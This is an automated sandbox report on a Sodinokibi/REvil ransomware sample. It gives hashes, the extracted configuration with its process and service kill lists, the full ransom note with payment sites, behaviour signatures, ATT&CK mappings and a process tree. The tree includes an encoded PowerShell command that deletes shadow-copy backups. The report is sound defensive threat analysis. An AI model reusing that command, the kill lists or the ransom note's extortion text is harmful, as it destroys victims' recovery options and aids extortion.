Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 19:07

General

  • Target

    42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe

  • Size

    222KB

  • MD5

    42a2e208bc7721348699212bc5cf50e5

  • SHA1

    15934add1f6f10bc50daa707bf8d02bb62edbdf7

  • SHA256

    d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de

  • SHA512

    2549f5273ea6120dc18a97c1f59324e6e5696b15bf7f56a5c22c4d1c461fd6da200272aa58529b42a8e2ce6e8c8b1298030b38298bed9194b26882be8cb8cebb

  • SSDEEP

    3072:sr85CIyyTsnAdu5tjgn/RRKwkwvMT3QE4f07YouoFhiLFrb30BRtBZZg+i2T:k9nyTsnXToKJw4gEWpoFuJ0BXScT

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$SlLR2WWgiOxrDQLqdHYA/Or5zeu.wNuMGc5rN/HHrIObc1EkKCIZa

Campaign

3181

Decoy

vannesteconstruct.be

irishmachineryauctions.com

zervicethai.co.th

ymca-cw.org.uk

trystana.com

smessier.com

beautychance.se

sabel-bf.com

kafu.ch

aselbermachen.com

first-2-aid-u.com

finediningweek.pl

berlin-bamboo-bikes.org

lbcframingelectrical.com

augenta.com

abitur-undwieweiter.de

digi-talents.com

wellplast.se

conasmanagement.de

simpkinsedwards.co.uk

Attributes
  • net

    true

  • pid

    $2a$10$SlLR2WWgiOxrDQLqdHYA/Or5zeu.wNuMGc5rN/HHrIObc1EkKCIZa

  • prc

    agntsvc

    wordpad

    onenote

    mydesktopqos

    mydesktopservice

    thunderbird

    winword

    excel

    visio

    isqlplussvc

    dbeng50

    encsvc

    steam

    mspub

    firefox

    outlook

    dbsnmp

    ocautoupds

    xfssvccon

    tbirdconfig

    msaccess

    ocomm

    sqbcoreservice

    sql

    ocssd

    oracle

    infopath

    synctime

    thebat

    powerpnt

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    3181

  • svc

    svc$

    backup

    vss

    sophos

    memtas

    sql

    mepocs

    veeam

Extracted

Path

C:\Users\69r5t5847-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 69r5t5847. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0E049F2593381959 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/0E049F2593381959 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WagjeJS1focIfZecMPkqi0yz+a30S6HEHF55ez6iWPhuOxa5Xhk6JeFoDqbHYrj4 ksV4e6UR5m3rDv0vNJU1VHbGke+zrWJNi7U6KoVotuDbe3ORjrfDkhOJGWeXQrcZ o8hNI45q+serV/KGTUoHItEhBCLau/S+x7524rxSWzUBW/a2vKtsFdtcGAm9/4Xu N7FpAbZU9hOY0h+fCrxuAz0ttQ0Z4jxn0QAnnaq6bxE3G9zo+/LS3wx5sVwPNnNs Co0+uXM6saQ85i9NTzuE8O7bA/M+7UIqaplRlT94M1uHeCLnEpKUcMRGxXGmJuc9 k+NMiiQozg230AOE48sELhe76wql6VQcl2oZ0Vp0FI7Ma2muZwqo6lB3Xlncaowt oTcoraiFVNK1ippx08qZtbUl8Uv5Zm4o9YLuqeivHbOWd5t6yPpblmrSN6OjPCET 2SFn5W8s9d4szmQlqhwtxNVz3ef7H6rvyCRbVCSuL+fqotKGzBCzz0siZW58wsKB 9e1/2yVzVo9IU54zdz/4d8HF6wDhfgzs3X2jnXNLt4YLNC3u2Ah78cEb0FZGh4PN HQGWY8SKd8MIIY9PZVklh584B2zH01VBpsTxqz8EwGR8lygYffylFCvyR8mTfa9M BxHlAzv52QwvDUcYQ7MDxTI1ZsS10E+b1cYiyXTCViOwkBmZc+Xf3kap9PHEPP3w LiTQYFh3tle56/0+epJY46/mFAuVJhPzBGkzKi1w+oP5npcFvGDWHfh8iQ4f+oaO C6F4wNRlw6MggJEiSnO4kMRKB3OWvKx24sgJVlmZlIAi5gD4wioxmCt2kW/bGQkL o7BJcoCs/wQQnaxv5+lC6RTGodk9HKaqiTPq1K1Uq7hGOsNMvjRv57Hoi0/eJuqK OqmETtNn6xrk0x8fbRsih4FrEzbH9XIMuBn3ysVeEhXpi7i2BAc5cT0ZUGHtdaP9 qfm7fCbRigEueeW71Plt7BnW2S4H8Aem/U8Z6/NUCJxT0uvXKtN+4fLmcyIZVZi2 bzI6YOmR4NW0Yn/+nMYbxk5Es84XbsXaj90vYSGOPS3ncWuylxfu5BofgqHNpfqb Tp6gby3FlT2uvRinzimkKAVkMf25uvBVyQ4vVZ/lPTBN9xW/sQZjtvq4aIzL1DYi 6wL9i7HIL0EIk9eYVls1cbc+W8ohRuFDOoOMWkYWIfEEFFdAPhPnZiJN/Xd+eXMl GNMOoPGra17Gef7p5C5PYTRvcejfKM7Ojyxm0lCY4+walswlNwEk5UyqKDKFOgxy w5gq630//pJ2eZxIbZOfCQ/xwKzeBNGb+i5zHnJEXQ5suEHscRyyn8NrDaz/MIpb MZi7WJEKCmg9X4YbViyqj7xOR3ycG3Wg81e+ekMI54oaHaKfaVE= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0E049F2593381959

http://decryptor.cc/0E049F2593381959

Signatures

  • Detect Neshta payload 3 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Users\Admin\AppData\Local\Temp\3582-490\42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3056
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2600
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1872

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Event Triggered Execution

    1
    T1546

    Change Default File Association

    1
    T1546.001

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Event Triggered Execution

    1
    T1546

    Change Default File Association

    1
    T1546.001

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    4
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Credential Access

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe
      Filesize

      547KB

      MD5

      cf6c595d3e5e9667667af096762fd9c4

      SHA1

      9bb44da8d7f6457099cb56e4f7d1026963dce7ce

      SHA256

      593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

      SHA512

      ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

    • C:\Users\69r5t5847-readme.txt
      Filesize

      6KB

      MD5

      09501885e7a579925bb3988a07f108f3

      SHA1

      02c704a76e4ca1255121bbfadcf9c8a3dd2af115

      SHA256

      16815fbddce345ede9da748f8f53317297a6afb2e39e4e2b28a241de056f95b5

      SHA512

      a05641fe43adf899ce16df7eda076f88d3593d371d403e9b701fc7ca91eec024946d51c5c93c20e7c1bf137de335bfb2ff732511ad75bb56dde8e501d1541880

    • C:\Users\Admin\AppData\Local\Temp\Cab5A62.tmp
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar5A84.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      191KB

      MD5

      307547b1af1cc21b1c6bed2a5fdc68f7

      SHA1

      e45cda38c434b299deff88bcd36f0cb40d0bdc34

      SHA256

      3be521ad71165336731fdf387d8051c3e63b5984eaeeebf4dc1c03e8ec5ef478

      SHA512

      2b9ad6c6366ba0c83f4bd440caa378ac5fe26cffe48d184c34c26ad216593f77f6c6a6e3baa342aa499c1e2a114c87a034894cbca9cb7a61511a7b7f4b83f30a

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      Filesize

      252KB

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\42a2e208bc7721348699212bc5cf50e5_JaffaCakes118.exe
      Filesize

      182KB

      MD5

      dbe120d11b3601be9d102ac83dbdc449

      SHA1

      3ecf3759ed50e08a3ee6e2dc298525baac0e861f

      SHA256

      0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999

      SHA512

      5769ff54058c023800fbf25939ae528e3f4ec7145553b666af9fc73087c7dab6ec37c762daa8a5741c29ed276babbfd3d626ad457ecc4308a0e71a4a52e399a3

    • memory/836-729-0x0000000000400000-0x000000000041B000-memory.dmp
      Filesize

      108KB

    • memory/836-768-0x0000000000400000-0x000000000041B000-memory.dmp
      Filesize

      108KB

    • memory/3056-90-0x000000001B500000-0x000000001B7E2000-memory.dmp
      Filesize

      2.9MB

    • memory/3056-91-0x0000000002070000-0x0000000002078000-memory.dmp
      Filesize

      32KB